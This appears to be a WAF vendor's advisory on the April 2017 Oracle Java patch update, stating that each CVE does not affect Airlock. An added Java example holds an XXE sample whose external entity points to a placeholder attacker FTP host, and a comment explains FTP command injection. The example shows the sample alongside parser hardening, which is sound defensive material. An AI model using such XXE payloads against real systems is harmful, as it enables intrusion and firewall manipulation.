Oracle CPU April 2017 - Java (WAF)

IDs: 
CVE-2017-3511, CVE-2017-3526, CVE-2017-3533, CVE-2017-3544, CVE-2017-3512, CVE-2017-3514, CVE-2017-3509, CVE-2017-3539
Keywords: 
java, cpu, Oracle Critical Patch Update
Description: 

The Oracle Critical Patch Update for April 2017 includes updates for Java SE [1] which fix 8 vulnerabilities.

  • CVE-2017-3533
    This is a newline injection in the JDK's FTP client. Combined with XML external entity attacks (XXE), it lets a remote attacker make the attacked machine send attacker-chosen FTP commands over a connection it opens itself, or trick a stateful firewall in front of it into opening ports.
    Airlock WAF is not affected because all XML input it parses is trusted. The Airlock SOAP and XML filters are not affected in their default configuration, since DTDs (and with them external entity declarations) are not allowed.
  • CVE-2017-3544
    This allows an attacker to manipulate SMTP connections by inserting newline characters into sender or recipient addresses when mails are sent, thereby injecting additional SMTP commands. Airlock WAF is not affected because the affected Java SMTP client is not used.
  • CVE-2017-3511
    This vulnerability concerns the JCE (Java Cryptography Extension) component and may allow a local attacker to escalate their privileges. Airlock WAF is not vulnerable, as local administrators are trusted.
  • CVE-2017-3526
    This issue in the JAXP component may allow denial of service attacks when parsing XML files. Airlock WAF is not affected because all XML input is trusted. The Airlock SOAP and XML filter are not affected, because Airlock WAF enforces size limits on XML documents.
  • CVE-2017-3512, CVE-2017-3514, CVE-2017-3509, CVE-2017-3539
    These only affect client deployments that run untrusted code, such as sandboxed applets or Java Web Start applications. Airlock WAF is not affected.
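To make the XXE path in the first bullet and the "DTDs are not allowed" mitigation concrete, the following is an added example; it is not part of the original advisory and is not Airlock code. A JAXP DOM parser is run with JDK default settings against a constructed document whose DTD declares an external entity, and then again with DOCTYPE declarations disallowed, which is one way to implement "no DTDs" in JAXP. The host name attacker.example, the entity name and the element names are hypothetical; a custom EntityResolver records the URL the default parser wants to fetch instead of actually connecting anywhere, so the code runs offline.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeDemo {

    // Constructed sample input (not taken from a real attack): a document whose
    // DTD declares an external entity. Host and path are hypothetical; an
    // attacker exploiting CVE-2017-3533 would put CR/LF plus FTP commands into
    // the path so that the JDK's FTP client sends them verbatim.
    static final String HOSTILE_XML =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE order [\n"
      + "  <!ENTITY ext SYSTEM \"ftp://attacker.example/x\">\n"
      + "]>\n"
      + "<order><note>&ext;</note></order>\n";

    /** Records which external entities the parser asks for, without fetching them. */
    static final class RecordingResolver implements EntityResolver {
        final List<String> requested = new ArrayList<>();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);
            // Hand back an empty entity so no network or file access happens.
            return new InputSource(new StringReader(""));
        }
    }

    /** Parse with JAXP defaults: the DTD is honoured and external entities are resolved. */
    static List<String> parsePermissive(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        DocumentBuilder b = f.newDocumentBuilder();
        RecordingResolver r = new RecordingResolver();
        b.setEntityResolver(r);
        b.parse(new InputSource(new StringReader(xml)));
        return r.requested;   // contains "ftp://attacker.example/x"
    }

    /** Parse with DOCTYPE declarations rejected outright; throws SAXParseException on HOSTILE_XML. */
    static Document parseHardened(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Xerces feature shipped with the JDK: any <!DOCTYPE ...> is a fatal error.
        // Without a DTD there can be neither external entities (XXE) nor
        // recursive internal entities (entity expansion denial of service).
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case another parser implementation is picked up.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        System.out.println("permissive parser wanted to fetch: " + parsePermissive(HOSTILE_XML));
        try {
            parseHardened(HOSTILE_XML);
            System.out.println("hardened parser accepted the document (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected it: " + e.getMessage());
        }
    }
}
```

The permissive run shows the parser handing the attacker-controlled ftp:// URL to the JDK's networking code, which is the exact point where CVE-2017-3533 becomes reachable; the hardened run never gets there because the document is rejected at the DOCTYPE. Rejecting DTDs also closes the entity-expansion denial of service covered by CVE-2017-3526, independently of the entity expansion limit the JDK applies by default.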
Resolution: 

No action required for Airlock WAF, Airlock XML filter and Airlock SOAP filter.

General Advice: We strongly recommend updating all client deployments of Java and uninstalling Java from clients where it is not needed.

Airlock Vulnerability Status: 
Does not affect Airlock
Back-end Vulnerability Status: 
No action required